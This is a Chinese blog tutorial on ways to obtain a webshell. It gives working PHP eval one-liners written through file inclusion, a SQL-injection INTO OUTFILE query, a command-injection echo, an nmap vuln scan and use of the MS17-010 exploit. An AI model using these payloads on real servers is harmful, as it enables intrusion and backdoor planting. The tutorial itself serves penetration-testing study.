IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> getshell思路 -> 正文阅读

[PHP知识库]getshell思路


授人以鱼,不如授人以渔

getshell能干嘛

1.执行终端命令
2.文件管理(增删改查)
3.数据库管理(增删改查,前提找到root用户密码)
在这里插入图片描述

文件上传getshell

网站有上传点,最容易getshell。
在这里插入图片描述
直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell
在这里插入图片描述
如果web应用对上传的文件进行过滤,要想办法绕过,如前端js绕过MIME验证绕过黑名单绕过大小写绕过,双写绕过,00截断,利用web容器的解析漏洞绕过等等,这里就不一一列举了

文件包含getshell

利用文件包含漏洞,输入php://input伪协议,进行写入一句话木马

<?php fputs(fopen('muma1.php','w'),'<?php echo "I am a horse";@eval($_REQUEST["pass"]);?>');?>

因为文件包含会解析php
所以当执行了这个脚本,会在目标服务器创建一个muma1.php的一句话木马
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
直接连接我们创建的木马,即可getshell
在这里插入图片描述

sql注入getshell

前提
1.secure_file_priv为空
2.当前数据库用户具有文件读写权限
3.魔术引号关闭
4.知道网站根目录路径

@@basedir 知道它的数据库根目录,去推测其web根目录
在这里插入图片描述
然后将木马导出到web根目录中

-1' union select 1,2,"<?php eval($_REQUEST['pass']);?>" into outfile "C:/phpstudy_pro/WWW/muma2.php"%23

在这里插入图片描述
使用webshell管理工具连接
在这里插入图片描述
在这里插入图片描述

操作系统漏洞getshell

利用操作系统内核溢出漏洞getshell
服务器ip(攻击者可以使用ping 域名获取,有CDN先绕过)
在这里插入图片描述
然后攻击者使用nmap NSE查看服务器的存在的漏洞

sudo nmap --script vuln -T 4 192.168.208.131

在这里插入图片描述
在这里插入图片描述
这里找到了两个漏洞,这里最有价值的是ms17-010(永恒之蓝)这个漏洞,因为可以RCE
接着就可以使用metasploit里的exp进行getshell了
在这里插入图片描述
在这里插入图片描述
这里的meterpreter就是一个shell,而且功能还十分强大,有兴趣可以自行了解

RCE getshell

当我们提交的数据被服务器当作终端命令执行的时候,其实已经getshell了,因为我们可以可以输入各种各样的终端命令,达到文件管理,用户管理等目的。
但这里还是演示下,当web应用有个RCE的其中一个利用方法

12 & echo "<?php echo "I am a horse";@eval($_REQUEST["pass"]);?>" > F:\phpstudy_pro\WWW\muma3.php

使用cmd命令写入一个一句话木马到web根目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
还有些cms,web容器,操作系统旧版本有RCE漏洞,直接利用就完事了,像之前很火的Apache log4j2漏洞也有RCE漏洞,总之服务器有RCE漏洞,就差不多相当于是自己的服务器了。

总结

以上就是我目前了解到的getshell方法,最好是在已授权的情况下测试或者在自己搭建的环境测试,不然可能会被查水表,日志里都记录了你干了啥,所以自己衡量吧。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-26 11:10:13  更:2022-02-26 11:10:17 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 10:37:58-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码